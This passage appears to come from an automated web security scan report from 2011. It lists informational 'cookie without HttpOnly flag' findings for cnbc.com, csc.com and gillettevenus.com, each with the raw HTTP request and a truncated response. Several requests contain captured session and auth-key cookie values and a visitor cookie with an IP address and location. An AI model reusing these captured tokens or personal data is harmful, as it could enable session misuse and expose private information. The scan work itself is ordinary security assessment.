Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:33:01 GMT
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/
Content-Length: 9
Connection: keep-alive

//opt out

13.199. http://www.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&source=(The%20Associated%20Press%20OR%20Reuters%20OR%20AFX%20OR%20The%20New%20York%20Times%20OR%20CNBC.COM)&layout=NoPic&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zce56gUZZEw56g4QDxJdQx%2fwgxtDBNooSLeqlBQuP1n34%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FqHt53A9BlIs=; TZM=-300; adops_master_kvs=; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; s_cc=true; xaikeeperua=yes; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e088dnyD6ChwJv%2bxcg%2f2dGRjw%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F4yDjO9qOD9M=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:26 GMT
Via: 1.1 C aicache6
Content-Length: 229771
Set-Cookie: xaikeeperua=yes; path=/
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Find the latest stock market news, information &amp; headlines. Get u
...[SNIP]...

13.200. http://www.cnbc.com/id/15837856

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15837856

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/15837856 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&layout=blogpost&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; adops_master_kvs=; xaikeeperua=yes; s_cc=true; __qseg=Q_D; s_nr=1315339051482; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc0N7KqRL%2blH5LCT1%2b0Uh3ks%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FgJb8gYY6CB4=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:30 GMT
Via: 1.1 C aicache6
Content-Length: 184638
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:36 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View the ...CNBC US Television... section &amp; see the full online T
...[SNIP]...

13.201. http://www.cnbc.com/id/15837856/site/14081545/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15837856/site/14081545/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/15837856/site/14081545/ HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&layout=blogpost&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; adops_master_kvs=; xaikeeperua=yes; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc1WB3hEycGiKfIKA9zI8x%2fY%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FI8/GrL59R8o=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:32 GMT
Via: 1.1 C aicache6
Content-Length: 184638
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:38 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View the ...CNBC US Television... section &amp; see the full online T
...[SNIP]...

13.202. http://www.cnbc.com/id/15838394

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15838394

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/15838394 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc5CZLOLbsDADnCVB%2fPbg0Qo%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fk2EwXOuiXD0=; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339076706; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CCNBC%252520U.S.%252520T%25257C%25257C15837856%25257CCNBC%252520U.S.%252520Television%25252C%252520TV%252520Schedule%252520for%252520Primetime%252520Te%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15838394%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc%2fY5ELdAENHOFxpoh%2bgPqkAQHkPk0lP1hvqCaED0yuYg%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fcf9Uq9kjbM8=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:58:00 GMT
Via: 1.1 C aicache6
Content-Length: 132851
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:58:07 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="&quot;The Call&quot; is a full hour of analysis, discussion and debat
...[SNIP]...

13.203. http://www.cnbc.com/id/15839263/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15839263/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/15839263/ HTTP/1.1
Host: www.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vR9Dq3E7N%2f0PZHYpJjzP7Ec%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FWozWH53xFGc=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:06:40 GMT
Via: 1.1 C aicache6
Content-Length: 103803
X-Aicache-OS: 65.55.53.237:80
Connection: close
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 15:06:47 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View our CNBC video gallery and find video news clips on the stock ma
...[SNIP]...

13.204. http://www.cnbc.com/pointrollads.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /pointrollads.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pointrollads.htm HTTP/1.1
Host: www.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vdxuU1kQdgmk3WPEusCCQGY%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F0G3LU09Tixk=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:06:42 GMT
Via: 1.1 aicache6
Content-Length: 95136
X-Aicache-OS: 65.55.53.237:80
Connection: close

<html class="cnbc_html" xmlns:tvservices="http://www.msnbc.com"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 &quot;http://w
...[SNIP]...

13.205. http://www.csc.com/cybersecurity/contact_us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /cybersecurity/contact_us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cybersecurity/contact_us HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.6.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:26 GMT
Status: 200
ETag: "4c56494684a77f8dc752e50b92174ca2"
X-Cache: MISS
X-Runtime: 47
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:26 GMT
Expires: Wed, 07 Sep 2011 16:09:26 GMT
Vary: Accept-Encoding
Content-Length: 8060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

13.206. http://www.csc.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=xss HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.1.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; visitor_action=content_id%3D29513%26zone_id%3D509%26content_type_id%3D13%26visits%3D1%26traffic_source%3Dreferral%26referrer%3Dwww.oracle.com/openworld/tools/mobile/index.html; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:57 GMT
Status: 200
ETag: "1673c8635aa207a1de3af02d09940037"
X-Runtime: 14
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26traffic_source%3Ddirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; path=/; HttpOnly
Expires: Wed, 07 Sep 2011 16:08:57 GMT
Vary: Accept-Encoding
Content-Length: 9018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

13.207. http://www.csc.com/services

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /services

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.2.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; s_sess=%20s_cc%3Dtrue%3B%20ev4%3Dxss%3B%20s_sq%3Dcsccom%253D%252526pid%25253DSearch%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/services%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:05 GMT
Status: 200
ETag: "fb1aa7a72cdf1607fbfd2a5107efce65"
X-Cache: MISS
X-Runtime: 33
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:05 GMT
Expires: Wed, 07 Sep 2011 16:09:05 GMT
Vary: Accept-Encoding
Content-Length: 9996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

13.208. http://www.csc.com/utils/live_search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /utils/live_search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/live_search?q=xss HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.1.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; visitor_action=content_id%3D29513%26zone_id%3D509%26content_type_id%3D13%26visits%3D1%26traffic_source%3Dreferral%26referrer%3Dwww.oracle.com/openworld/tools/mobile/index.html; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:57 GMT
Status: 200
ETag: "6855c96cfed8218fbfb755df41adf389"
X-Runtime: 3
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Dreferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; path=/; HttpOnly
Expires: Wed, 07 Sep 2011 16:08:57 GMT
Vary: Accept-Encoding
Content-Length: 2083


<a href="http://assets1.csc.com/es/downloads/7380_2.pdf?ref=ls">7380_2.pdf</a> <br />

<b>...</b> technologies. And the eThreat ...winners... are: ... Web application exploits,<br> partic
...[SNIP]...

13.209. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/buy_it_now/product_links.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/buy_it_now/product_links.jsp?upc=047400098978 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
